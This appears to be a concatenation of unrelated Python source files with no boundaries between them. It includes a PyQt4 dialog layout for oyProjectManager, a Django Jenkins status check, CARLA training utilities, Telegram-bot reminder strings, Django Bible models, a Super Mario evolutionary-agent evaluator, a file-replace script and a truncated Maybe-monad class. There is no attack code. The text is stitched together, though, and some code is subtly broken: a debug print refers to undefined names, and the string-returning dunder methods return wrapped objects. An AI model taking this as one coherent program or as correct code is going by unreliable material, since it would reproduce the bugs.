self.horizontalLayout_12.setObjectName("horizontalLayout_12") self.verticalLayout_9 = QtGui.QVBoxLayout() self.verticalLayout_9.setObjectName("verticalLayout_9") self.horizontalLayout_13 = QtGui.QHBoxLayout() self.horizontalLayout_13.setObjectName("horizontalLayout_13") self.shot_name_label = QtGui.QLabel(self.asset_info_groupBox_2) font = QtGui.QFont() font.setWeight(50) font.setBold(False) self.shot_name_label.setFont(font) self.shot_name_label.setObjectName("shot_name_label") self.horizontalLayout_13.addWidget(self.shot_name_label) spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_13.addItem(spacerItem3) self.create_shot_pushButton = QtGui.QPushButton(self.asset_info_groupBox_2) self.create_shot_pushButton.setEnabled(False) self.create_shot_pushButton.setObjectName("create_shot_pushButton") self.horizontalLayout_13.addWidget(self.create_shot_pushButton) self.verticalLayout_9.addLayout(self.horizontalLayout_13) self.shots_listWidget = QtGui.QListWidget(self.asset_info_groupBox_2) self.shots_listWidget.setObjectName("shots_listWidget") self.verticalLayout_9.addWidget(self.shots_listWidget) self.gridLayout = QtGui.QGridLayout() self.gridLayout.setObjectName("gridLayout") self.frame_range_label = QtGui.QLabel(self.asset_info_groupBox_2) self.frame_range_label.setObjectName("frame_range_label") self.gridLayout.addWidget(self.frame_range_label, 0, 0, 1, 1) self.start_frame_spinBox = QtGui.QSpinBox(self.asset_info_groupBox_2) self.start_frame_spinBox.setMaximum(9999) self.start_frame_spinBox.setObjectName("start_frame_spinBox") self.gridLayout.addWidget(self.start_frame_spinBox, 0, 1, 1, 1) self.end_frame_spinBox = QtGui.QSpinBox(self.asset_info_groupBox_2) self.end_frame_spinBox.setMaximum(9999) self.end_frame_spinBox.setObjectName("end_frame_spinBox") self.gridLayout.addWidget(self.end_frame_spinBox, 0, 2, 1, 1) self.handles_label = QtGui.QLabel(self.asset_info_groupBox_2) self.handles_label.setObjectName("handles_label") self.gridLayout.addWidget(self.handles_label, 1, 0, 1, 1) self.handle_at_start_spinBox = QtGui.QSpinBox(self.asset_info_groupBox_2) self.handle_at_start_spinBox.setMaximum(9999) self.handle_at_start_spinBox.setObjectName("handle_at_start_spinBox") self.gridLayout.addWidget(self.handle_at_start_spinBox, 1, 1, 1, 1) self.handle_at_end_spinBox = QtGui.QSpinBox(self.asset_info_groupBox_2) self.handle_at_end_spinBox.setMaximum(9999) self.handle_at_end_spinBox.setObjectName("handle_at_end_spinBox") self.gridLayout.addWidget(self.handle_at_end_spinBox, 1, 2, 1, 1) self.shot_info_update_pushButton = QtGui.QPushButton(self.asset_info_groupBox_2) self.shot_info_update_pushButton.setObjectName("shot_info_update_pushButton") self.gridLayout.addWidget(self.shot_info_update_pushButton, 1, 3, 1, 1) self.verticalLayout_9.addLayout(self.gridLayout) self.horizontalLayout_12.addLayout(self.verticalLayout_9) self.verticalLayout_8.addLayout(self.horizontalLayout_12) self.verticalLayout_11.addWidget(self.asset_info_groupBox_2) self.tabWidget.addTab(self.shots_tab, "") self.verticalLayout_5.addWidget(self.tabWidget) self.horizontalLayout_8 = QtGui.QHBoxLayout() self.horizontalLayout_8.setObjectName("horizontalLayout_8") self.thumbnail_graphicsView = QtGui.QGraphicsView(self.verticalWidget) sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.thumbnail_graphicsView.sizePolicy().hasHeightForWidth()) self.thumbnail_graphicsView.setSizePolicy(sizePolicy) self.thumbnail_graphicsView.setMinimumSize(QtCore.QSize(320, 180)) self.thumbnail_graphicsView.setMaximumSize(QtCore.QSize(320, 180)) self.thumbnail_graphicsView.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff) self.thumbnail_graphicsView.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff) brush = QtGui.QBrush(QtGui.QColor(0, 0, 0)) brush.setStyle(QtCore.Qt.SolidPattern) self.thumbnail_graphicsView.setBackgroundBrush(brush) self.thumbnail_graphicsView.setInteractive(False) self.thumbnail_graphicsView.setRenderHints(QtGui.QPainter.Antialiasing|QtGui.QPainter.HighQualityAntialiasing|QtGui.QPainter.SmoothPixmapTransform|QtGui.QPainter.TextAntialiasing) self.thumbnail_graphicsView.setObjectName("thumbnail_graphicsView") self.horizontalLayout_8.addWidget(self.thumbnail_graphicsView) self.verticalLayout_5.addLayout(self.horizontalLayout_8) self.horizontalLayout_16 = QtGui.QHBoxLayout() self.horizontalLayout_16.setContentsMargins(-1, -1, -1, 10) self.horizontalLayout_16.setObjectName("horizontalLayout_16") spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_16.addItem(spacerItem4) self.upload_thumbnail_pushButton = QtGui.QPushButton(self.verticalWidget) self.upload_thumbnail_pushButton.setObjectName("upload_thumbnail_pushButton") self.horizontalLayout_16.addWidget(self.upload_thumbnail_pushButton) self.verticalLayout_5.addLayout(self.horizontalLayout_16) self.horizontalLayout_14.addLayout(self.verticalLayout_5) self.line_2 = QtGui.QFrame(self.verticalWidget) self.line_2.setFrameShape(QtGui.QFrame.VLine) self.line_2.setFrameShadow(QtGui.QFrame.Sunken) self.line_2.setObjectName("line_2") self.horizontalLayout_14.addWidget(self.line_2) self.new_version_groupBox = QtGui.QGroupBox(self.verticalWidget) self.new_version_groupBox.setObjectName("new_version_groupBox") self.verticalLayout_6 = QtGui.QVBoxLayout(self.new_version_groupBox) self.verticalLayout_6.setObjectName("verticalLayout_6") self.gridLayout_3 = QtGui.QGridLayout() self.gridLayout_3.setObjectName("gridLayout_3") self.takes_label = QtGui.QLabel(self.new_version_groupBox) self.takes_label.setMinimumSize(QtCore.QSize(35, 0)) font = QtGui.QFont() font.setWeight(50) font.setBold(False) self.takes_label.setFont(font) self.takes_label.setObjectName("takes_label") self.gridLayout_3.addWidget(self.takes_label, 1, 0, 1, 1) self.note_label = QtGui.QLabel(self.new_version_groupBox) self.note_label.setMinimumSize(QtCore.QSize(35, 0)) self.note_label.setObjectName("note_label") self.gridLayout_3.addWidget(self.note_label, 2, 0, 1, 1) self.version_types_label = QtGui.QLabel(self.new_version_groupBox) self.version_types_label.setMinimumSize(QtCore.QSize(35, 0)) font = QtGui.QFont() font.setWeight(50) font.setBold(False) self.version_types_label.setFont(font) self.version_types_label.setObjectName("version_types_label") self.gridLayout_3.addWidget(self.version_types_label, 0, 0, 1, 1) self.horizontalLayout_4 = QtGui.QHBoxLayout() self.horizontalLayout_4.setObjectName("horizontalLayout_4") self.version_types_listWidget = QtGui.QListWidget(self.new_version_groupBox) self.version_types_listWidget.setObjectName("version_types_listWidget") self.horizontalLayout_4.addWidget(self.version_types_listWidget) self.add_type_toolButton = QtGui.QToolButton(self.new_version_groupBox) self.add_type_toolButton.setObjectName("add_type_toolButton") self.horizontalLayout_4.addWidget(self.add_type_toolButton) self.gridLayout_3.addLayout(self.horizontalLayout_4, 0, 1, 1, 1) self.horizontalLayout_6 = QtGui.QHBoxLayout() self.horizontalLayout_6.setObjectName("horizontalLayout_6") self.takes_listWidget = QtGui.QListWidget(self.new_version_groupBox) self.takes_listWidget.setObjectName("takes_listWidget") self.horizontalLayout_6.addWidget(self.takes_listWidget) self.add_take_toolButton = QtGui.QToolButton(self.new_version_groupBox) self.add_take_toolButton.setObjectName("add_take_toolButton") self.horizontalLayout_6.addWidget(self.add_take_toolButton) self.gridLayout_3.addLayout(self.horizontalLayout_6, 1, 1, 1, 1) self.note_textEdit = QtGui.QTextEdit(self.new_version_groupBox) self.note_textEdit.setEnabled(True) self.note_textEdit.setTabChangesFocus(True) self.note_textEdit.setObjectName("note_textEdit") self.gridLayout_3.addWidget(self.note_textEdit, 2, 1, 1, 1) self.verticalLayout_6.addLayout(self.gridLayout_3) self.horizontalLayout_7 = QtGui.QHBoxLayout() self.horizontalLayout_7.setObjectName("horizontalLayout_7") self.status_label = QtGui.QLabel(self.new_version_groupBox) self.status_label.setObjectName("status_label") self.horizontalLayout_7.addWidget(self.status_label) self.statuses_comboBox = QtGui.QComboBox(self.new_version_groupBox) self.statuses_comboBox.setObjectName("statuses_comboBox") self.horizontalLayout_7.addWidget(self.statuses_comboBox) spacerItem5 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_7.addItem(spacerItem5) self.publish_checkBox = QtGui.QCheckBox(self.new_version_groupBox) self.publish_checkBox.setObjectName("publish_checkBox") self.horizontalLayout_7.addWidget(self.publish_checkBox) self.verticalLayout_6.addLayout(self.horizontalLayout_7) self.horizontalLayout_17 = QtGui.QHBoxLayout() self.horizontalLayout_17.setObjectName("horizontalLayout_17") spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_17.addItem(spacerItem6) self.update_paths_checkBox = QtGui.QCheckBox(self.new_version_groupBox) self.update_paths_checkBox.setChecked(True) self.update_paths_checkBox.setObjectName("update_paths_checkBox") self.horizontalLayout_17.addWidget(self.update_paths_checkBox) self.verticalLayout_6.addLayout(self.horizontalLayout_17) self.horizontalLayout_2 = QtGui.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") spacerItem7 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_2.addItem(spacerItem7) self.export_as_pushButton = QtGui.QPushButton(self.new_version_groupBox) self.export_as_pushButton.setObjectName("export_as_pushButton") self.horizontalLayout_2.addWidget(self.export_as_pushButton) self.save_as_pushButton = QtGui.QPushButton(self.new_version_groupBox) self.save_as_pushButton.setDefault(True) self.save_as_pushButton.setObjectName("save_as_pushButton") self.horizontalLayout_2.addWidget(self.save_as_pushButton) self.verticalLayout_6.addLayout(self.horizontalLayout_2) self.horizontalLayout_14.addWidget(self.new_version_groupBox) self.line = QtGui.QFrame(self.verticalWidget) self.line.setFrameShape(QtGui.QFrame.VLine) self.line.setFrameShadow(QtGui.QFrame.Sunken) self.line.setObjectName("line") self.horizontalLayout_14.addWidget(self.line) self.previous_versions_groupBox = QtGui.QGroupBox(self.verticalWidget) self.previous_versions_groupBox.setObjectName("previous_versions_groupBox") self.verticalLayout_7 = QtGui.QVBoxLayout(self.previous_versions_groupBox) self.verticalLayout_7.setObjectName("verticalLayout_7") self.horizontalLayout_10 = QtGui.QHBoxLayout() self.horizontalLayout_10.setObjectName("horizontalLayout_10") self.show_published_only_checkBox = QtGui.QCheckBox(self.previous_versions_groupBox) self.show_published_only_checkBox.setObjectName("show_published_only_checkBox") self.horizontalLayout_10.addWidget(self.show_published_only_checkBox) spacerItem8 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_10.addItem(spacerItem8) self.show_only_label = QtGui.QLabel(self.previous_versions_groupBox) self.show_only_label.setObjectName("show_only_label") self.horizontalLayout_10.addWidget(self.show_only_label) self.version_count_spinBox = QtGui.QSpinBox(self.previous_versions_groupBox) self.version_count_spinBox.setMaximum(999999) self.version_count_spinBox.setProperty("value", 16) self.version_count_spinBox.setObjectName("version_count_spinBox") self.horizontalLayout_10.addWidget(self.version_count_spinBox) self.verticalLayout_7.addLayout(self.horizontalLayout_10) self.previous_versions_tableWidget = QtGui.QTableWidget(self.previous_versions_groupBox) self.previous_versions_tableWidget.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers) self.previous_versions_tableWidget.setAlternatingRowColors(True) self.previous_versions_tableWidget.setSelectionMode(QtGui.QAbstractItemView.SingleSelection) self.previous_versions_tableWidget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows) self.previous_versions_tableWidget.setShowGrid(False) self.previous_versions_tableWidget.setColumnCount(6) self.previous_versions_tableWidget.setObjectName("previous_versions_tableWidget") self.previous_versions_tableWidget.setColumnCount(6) self.previous_versions_tableWidget.setRowCount(0) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(0, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(1, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(2, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(3, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(4, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(5, item) self.previous_versions_tableWidget.horizontalHeader().setStretchLastSection(True) self.previous_versions_tableWidget.verticalHeader().setStretchLastSection(False) self.verticalLayout_7.addWidget(self.previous_versions_tableWidget) self.horizontalLayout_5 = QtGui.QHBoxLayout() self.horizontalLayout_5.setObjectName("horizontalLayout_5") spacerItem9 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_5.addItem(spacerItem9) self.chose_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.chose_pushButton.setObjectName("chose_pushButton") self.horizontalLayout_5.addWidget(self.chose_pushButton) self.open_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.open_pushButton.setObjectName("open_pushButton") self.horizontalLayout_5.addWidget(self.open_pushButton) self.reference_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.reference_pushButton.setObjectName("reference_pushButton") self.horizontalLayout_5.addWidget(self.reference_pushButton) self.import_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.import_pushButton.setObjectName("import_pushButton") self.horizontalLayout_5.addWidget(self.import_pushButton) self.close_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.close_pushButton.setStyleSheet("") self.close_pushButton.setDefault(False) self.close_pushButton.setFlat(False) self.close_pushButton.setObjectName("close_pushButton") self.horizontalLayout_5.addWidget(self.close_pushButton) self.verticalLayout_7.addLayout(self.horizontalLayout_5) self.horizontalLayout_14.addWidget(self.previous_versions_groupBox) self.horizontalLayout_14.setStretch(4, 1) self.verticalLayout.addLayout(self.horizontalLayout_14) self.horizontalLayout.addWidget(self.verticalWidget) self.retranslateUi(Dialog) self.tabWidget.setCurrentIndex(0) QtCore.QMetaObject.connectSlotsByName(Dialog) Dialog.setTabOrder(self.projects_comboBox, self.users_comboBox) Dialog.setTabOrder(self.users_comboBox, self.create_asset_pushButton) Dialog.setTabOrder(self.create_asset_pushButton, self.sequences_comboBox) Dialog.setTabOrder(self.sequences_comboBox, self.create_shot_pushButton) Dialog.setTabOrder(self.create_shot_pushButton, self.shots_listWidget) Dialog.setTabOrder(self.shots_listWidget, self.add_type_toolButton) Dialog.setTabOrder(self.add_type_toolButton, self.add_take_toolButton) Dialog.setTabOrder(self.add_take_toolButton, self.note_textEdit) Dialog.setTabOrder(self.note_textEdit, self.export_as_pushButton) Dialog.setTabOrder(self.export_as_pushButton, self.save_as_pushButton) Dialog.setTabOrder(self.save_as_pushButton, self.previous_versions_tableWidget) Dialog.setTabOrder(self.previous_versions_tableWidget, self.open_pushButton) Dialog.setTabOrder(self.open_pushButton, self.reference_pushButton) Dialog.setTabOrder(self.reference_pushButton, self.import_pushButton) def retranslateUi(self, Dialog): Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Version Creator - oyProjectManager", None, QtGui.QApplication.UnicodeUTF8)) self.projects_label.setText(QtGui.QApplication.translate("Dialog", "Project", None, QtGui.QApplication.UnicodeUTF8)) self.client_label.setText(QtGui.QApplication.translate("Dialog", "Client:", None, QtGui.QApplication.UnicodeUTF8)) self.client_name_label.setText(QtGui.QApplication.translate("Dialog", "TextLabel", None, QtGui.QApplication.UnicodeUTF8)) self.user_label.setText(QtGui.QApplication.translate("Dialog", "User", None, QtGui.QApplication.UnicodeUTF8)) self.asset_info_groupBox.setTitle(QtGui.QApplication.translate("Dialog", "Asset Information", None, QtGui.QApplication.UnicodeUTF8)) self.asset_name_label.setText(QtGui.QApplication.translate("Dialog", "Name", None, QtGui.QApplication.UnicodeUTF8)) self.create_asset_pushButton.setText(QtGui.QApplication.translate("Dialog", "Create New Asset", None, QtGui.QApplication.UnicodeUTF8)) self.assets_tableWidget.setToolTip(QtGui.QApplication.translate("Dialog", "

    Right click to

    • Rename Asset
    ", None, QtGui.QApplication.UnicodeUTF8)) self.assets_tableWidget.horizontalHeaderItem(0).setText(QtGui.QApplication.translate("Dialog", "Type", None, QtGui.QApplication.UnicodeUTF8)) self.assets_tableWidget.horizontalHeaderItem(1).setText(QtGui.QApplication.translate("Dialog", "Name", None, QtGui.QApplication.UnicodeUTF8)) self.tabWidget.setTabText(self.tabWidget.indexOf(self.assets_tab), QtGui.QApplication.translate("Dialog", "Assets", None, QtGui.QApplication.UnicodeUTF8)) self.sequences_label.setText(QtGui.QApplication.translate("Dialog", "Sequence", None, QtGui.QApplication.UnicodeUTF8)) self.asset_info_groupBox_2.setTitle(QtGui.QApplication.translate("Dialog", "Shot Information", None, QtGui.QApplication.UnicodeUTF8)) self.shot_name_label.setText(QtGui.QApplication.translate("Dialog", "Name", None, QtGui.QApplication.UnicodeUTF8)) self.create_shot_pushButton.setText(QtGui.QApplication.translate("Dialog", "Create New Shot", None, QtGui.QApplication.UnicodeUTF8)) self.frame_range_label.setText(QtGui.QApplication.translate("Dialog", "Range", None, QtGui.QApplication.UnicodeUTF8)) self.handles_label.setText(QtGui.QApplication.translate("Dialog", "Handles", None, QtGui.QApplication.UnicodeUTF8)) self.shot_info_update_pushButton.setText(QtGui.QApplication.translate("Dialog", "Update", None, QtGui.QApplication.UnicodeUTF8)) self.tabWidget.setTabText(self.tabWidget.indexOf(self.shots_tab), QtGui.QApplication.translate("Dialog", "Shots", None, QtGui.QApplication.UnicodeUTF8)) self.upload_thumbnail_pushButton.setText(QtGui.QApplication.translate("Dialog", "Upload Thumbnail...", None, QtGui.QApplication.UnicodeUTF8)) self.new_version_groupBox.setTitle(QtGui.QApplication.translate("Dialog", "New Version", None, QtGui.QApplication.UnicodeUTF8)) self.takes_label.setText(QtGui.QApplication.translate("Dialog", "Take", None, QtGui.QApplication.UnicodeUTF8)) self.note_label.setText(QtGui.QApplication.translate("Dialog", "Note", None, QtGui.QApplication.UnicodeUTF8)) self.version_types_label.setText(QtGui.QApplication.translate("Dialog", "Type", None, QtGui.QApplication.UnicodeUTF8)) self.add_type_toolButton.setText(QtGui.QApplication.translate("Dialog", "+", None, QtGui.QApplication.UnicodeUTF8)) self.add_take_toolButton.setText(QtGui.QApplication.translate("Dialog", "+", None, QtGui.QApplication.UnicodeUTF8)) self.note_textEdit.setHtml(QtGui.QApplication.translate("Dialog", "\n" "\n" "


    ", None, QtGui.QApplication.UnicodeUTF8)) self.status_label.setText(QtGui.QApplication.translate("Dialog", "Status", None, QtGui.QApplication.UnicodeUTF8)) self.publish_checkBox.setText(QtGui.QApplication.translate("Dialog", "Publish", None, QtGui.QApplication.UnicodeUTF8)) self.update_paths_checkBox.setText(QtGui.QApplication.translate("Dialog", "Update Paths", None, QtGui.QApplication.UnicodeUTF8)) self.export_as_pushButton.setText(QtGui.QApplication.translate("Dialog", "Export Selection As", None, QtGui.QApplication.UnicodeUTF8)) self.save_as_pushButton.setText(QtGui.QApplication.translate("Dialog", "Save As", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_groupBox.setTitle(QtGui.QApplication.translate("Dialog", "Previous Versions", None, QtGui.QApplication.UnicodeUTF8)) self.show_published_only_checkBox.setText(QtGui.QApplication.translate("Dialog", "Show Published Only", None, QtGui.QApplication.UnicodeUTF8)) self.show_only_label.setText(QtGui.QApplication.translate("Dialog", "Show Only", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.setToolTip(QtGui.QApplication.translate("Dialog", "

    Right click to:

    • Change Status
    • Browse Outputs

    Double click to:

    • Open
    ", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(0).setText(QtGui.QApplication.translate("Dialog", "Version", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(1).setText(QtGui.QApplication.translate("Dialog", "User", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(2).setText(QtGui.QApplication.translate("Dialog", "Status", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(3).setText(QtGui.QApplication.translate("Dialog", "File Size", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(4).setText(QtGui.QApplication.translate("Dialog", "Date", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(5).setText(QtGui.QApplication.translate("Dialog", "Note", None, QtGui.QApplication.UnicodeUTF8)) self.chose_pushButton.setText(QtGui.QApplication.translate("Dialog", "Choose", None, QtGui.QApplication.UnicodeUTF8)) self.open_pushButton.setText(QtGui.QApplication.translate("Dialog", "Open", None, QtGui.QApplication.UnicodeUTF8)) self.reference_pushButton.setText(QtGui.QApplication.translate("Dialog", "Reference", None, QtGui.QApplication.UnicodeUTF8)) self.import_pushButton.setText(QtGui.QApplication.translate("Dialog", "Import", None, QtGui.QApplication.UnicodeUTF8)) self.close_pushButton.setText(QtGui.QApplication.translate("Dialog", "Close", None, QtGui.QApplication.UnicodeUTF8)) import os from django.db import models from ..jenkins import get_job_status from .base import StatusCheck, StatusCheckResult class JenkinsStatusCheck(StatusCheck): jenkins_config = models.ForeignKey('JenkinsConfig') @property def check_category(self): return "Jenkins check" @property def failing_short_status(self): return 'Job failing on Jenkins' def _run(self): result = StatusCheckResult(status_check=self) try: status = get_job_status(self.jenkins_config, self.name) active = status['active'] result.job_number = status['job_number'] if status['status_code'] == 404: result.error = u'Job %s not found on Jenkins' % self.name result.succeeded = False return result elif status['status_code'] > 400: # Will fall through to next block raise Exception(u'returned %s' % status['status_code']) except Exception as e: # If something else goes wrong, we will *not* fail - otherwise # a lot of services seem to fail all at once. # Ugly to do it here but... result.error = u'Error fetching from Jenkins - %s' % e.message result.succeeded = True return result if not active: # We will fail if the job has been disabled result.error = u'Job "%s" disabled on Jenkins' % self.name result.succeeded = False else: if self.max_queued_build_time and status['blocked_build_time']: if status['blocked_build_time'] > self.max_queued_build_time * 60: result.succeeded = False result.error = u'Job "%s" has blocked build waiting for %ss (> %sm)' % ( self.name, int(status['blocked_build_time']), self.max_queued_build_time, ) result.job_number = status['queued_job_number'] else: result.succeeded = status['succeeded'] else: result.succeeded = status['succeeded'] if not status['succeeded']: message = u'Job "%s" failing on Jenkins (%s)' % (self.name, status['consecutive_failures']) if result.error: result.error += u'; %s' % message else: result.error = message result.raw_data = status return result def calculate_debounced_passing(self, recent_results, debounce=0): """ `debounce` is the number of previous job failures we need (not including this) to mark a search as passing or failing Returns: True if passing given debounce factor False if failing """ last_result = recent_results[0] return last_result.consecutive_failures <= debounce class JenkinsConfig(models.Model): name = models.CharField(max_length=30, blank=False) jenkins_api = models.CharField(max_length=2000, blank=False) jenkins_user = models.CharField(max_length=2000, blank=False) jenkins_pass = models.CharField(max_length=2000, blank=False) def __str__(self): return self.name def create_default_jenkins_config(): if not JenkinsConfig.objects.exists(): if os.environ.get("JENKINS_API"): JenkinsConfig.objects.create( name="Default Jenkins", jenkins_api=os.environ.get("JENKINS_API", "http://jenkins.example.com"), jenkins_user=os.environ.get("JENKINS_USER", ""), jenkins_pass=os.environ.get("JENKINS_PASS", ""), ) #!/usr/bin/env python # coding=utf-8 ''' Author: Date:Thu Nov 22 12:09:27 2018 Info: ''' import os import random import shutil import torch # original transformations # check: https://github.com/carla-simulator/imitation-learning/issues/1 # from imgaug import augmenters as iaa # st = lambda aug: iaa.Sometimes(0.4, aug) # oc = lambda aug: iaa.Sometimes(0.3, aug) # rl = lambda aug: iaa.Sometimes(0.09, aug) # seq = iaa.SomeOf((4, None), [ # # blur images with a sigma between 0 and 1.5 # rl(iaa.GaussianBlur((0, 1.5))), # # add gaussian noise to images # rl(iaa.AdditiveGaussianNoise( # loc=0, # scale=(0.0, 0.05), # per_channel=0.5)), # # randomly remove up to X% of the pixels # oc(iaa.Dropout((0.0, 0.10), per_channel=0.5)), # # randomly remove up to X% of the pixels # oc(iaa.CoarseDropout( # (0.0, 0.10), size_percent=(0.08, 0.2), per_channel=0.5)), # # change brightness of images (by -X to Y of original value) # oc(iaa.Add((-40, 40), per_channel=0.5)), # # change brightness of images (X-Y% of original value) # st(iaa.Multiply((0.10, 2.5), per_channel=0.2)), # # improve or worsen the contrast # rl(iaa.ContrastNormalization((0.5, 1.5), per_channel=0.5)), # # rl(iaa.Grayscale((0.0, 1))), # put grayscale # ], random_order=True) class TransWrapper(object): def __init__(self, seq): self.seq = seq def __call__(self, img): return self.seq.augment_image(img) class RandomTransWrapper(object): def __init__(self, seq, p=0.5): self.seq = seq self.p = p def __call__(self, img): if self.p < random.random(): return img return self.seq.augment_image(img) class AverageMeter(object): """Computes and stores the average and current value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count def save_checkpoint(state, id_, is_best, filename='checkpoint.pth'): torch.save(state, filename) if is_best: shutil.copyfile( filename, os.path.join("save_models", "{}_best.pth".format(id_)) ) # - coding: utf-8 - from datetime import datetime start = '''Hi FLowers !\n''' hlp = '''Good day! /help - show this help /links - useful links /faq_en - answers for common questions For the kitchen cleaning schedule check pinned message and #cleaning hashtag ''' links = '''Links Here: sit.org -- "SIT" ''' now = datetime.now() faq_en = ('There will be a FAQ', now ) clean_hashtag = '#cleaning' clean_headers = [ 'Clean the Kitchen, if you are not an a**hole \n' 'Cmon slow hands, Clean the Dirty Kitchen!\n', 'Dont Be Lazy and start cleaning! \n', 'Clean the kitchen!!!!! and be a man \n', ] clean_body = 'In the morning {}:\t{} and in the night {}\n' from django.db import models from managers import BookManager class Book(models.Model): """ Book of the Bible """ number = models.PositiveIntegerField(primary_key=True, unique=True, db_index=True) slug = models.SlugField(unique=True) name = models.CharField(max_length=64, db_index=True) is_new_testament = models.BooleanField() objects = BookManager() @models.permalink def get_absolute_url(self): """ Returns the absolute url """ return ('book_detail', [self.slug,]) def __unicode__(self): return self.name class Meta: ordering = ['number',] class Chapter(models.Model): """ Chapter of the Bible """ book = models.ForeignKey(Book, related_name='chapters') number = models.PositiveIntegerField(db_index=True) def __unicode__(self): return '%s %s' % (self.book.name, self.number) def get_next_chapter(self): try: return Chapter.objects.filter( book=self.book,number__gt=self.number).order_by( 'number')[0] except IndexError: return None def get_previous_chapter(self): try: return Chapter.objects.filter( book=self.book,number__lt=self.number).order_by( '-number')[0] except IndexError: return None @models.permalink def get_absolute_url(self): """ Returns the absolute url """ return ('chapter_detail', [self.book.slug, self.number]) class Meta: ordering = ['number',] unique_together=(('book','number',),) class Verse(models.Model): """ Bible Verse """ chapter = models.ForeignKey(Chapter, related_name='verses') number = models.PositiveIntegerField(db_index=True) text = models.TextField() class Meta: ordering = ['number'] unique_together=(('chapter','number'),) def __unicode__(self): return '%s %s:%s' % (self.chapter.book.name, self.chapter.number, self.number) def get_absolute_url(self): return '%s#%s' % (self.chapter.get_absolute_url(), self.number) import retro from cgp.cgp_model import Population, Genome from mario_emu.discretizer import SuperMarioDiscretizer from mario_emu.picture_processor import PictureProcessor class Emulator: def __init__(self): self.env = retro.make('SuperMarioBros-Nes') self.disc = SuperMarioDiscretizer(self.env) def _evaluate_genome(self, g: Genome, render: bool = False, debug=False) -> float: observation = self.env.reset() total_reward = 0.0 stuck_score = 0 for i in range(1, 10000): if render: self.env.render() ob_flat = PictureProcessor.process(observation) action = self.disc.action(g.evaluate(ob_flat).argmax()) observation, reward, done, info = self.env.step(action) total_reward += reward stuck_score += reward if total_reward < 0: break if i % 100 == 0: if stuck_score <= 0: break stuck_score = 0 if done: break if debug: print("Genome {} got reward {}".format(p.list_genomes[i], p.list_scores[i])) return total_reward @staticmethod def eval_population(p: Population, render=False, debug=False): e = Emulator() for i in range(len(p.list_genomes)): if p.list_scores[i] is None: p.list_scores[i] = e._evaluate_genome(p.list_genomes[i], render, debug) @staticmethod def get_action_space_size(): return SuperMarioDiscretizer(retro.make('SuperMarioBros-Nes')).action_space.n def replace(s1,s2,n1,n2): f1=open(n1,"r") f2=open(n2,"w") a=f1.read() newtxt=a.replace(s1,s2) f2.write(newtxt) f1.close() f2.close() replace ("*","&","que19.txt","New.txt") __all__ = ['maybe'] class NoValueError(Exception): pass class Maybe: pass class Just(Maybe): class JustDelegator: def __init__(self, val): self.val = val def __getattr__(self, name): return maybe(getattr(self.val, name)) def __getitem__(self, item): try: return maybe(self.val[item]) except (KeyError, IndexError, TypeError): return nothing def __missing__(self, key): return maybe(self.val.__missing__(key)) def __setitem__(self, key, value): self.val.__setitem__(key, value) def __delitem__(self, key): self.val.__delitem__(key) def __repr__(self): return maybe(self.val.__repr__()) def __str__(self): return maybe(self.val.__str__()) def __bytes__(self): return maybe(self.val.__bytes__()) def __format__(self, format_spec): return maybe(self.val.__format__(format_spec)) def __lt__(self, other): return maybe(self.val.__lt__(other)) def __le__(self, other): return maybe(self.val.__le__(other)) def __eq__(self, other): return maybe(self.val.__eq__(other)) def __ne__(self, other): return maybe(self.val.__ne__(other)) def __gt__(self, other): return maybe(self.val.__gt__(other)) def __ge__(self, other): return maybe(self.val.__ge__(other)) def __hash__(self): return maybe(self.val.__hash__()) def __bool__(self): return maybe(self.val.__bool__()) def 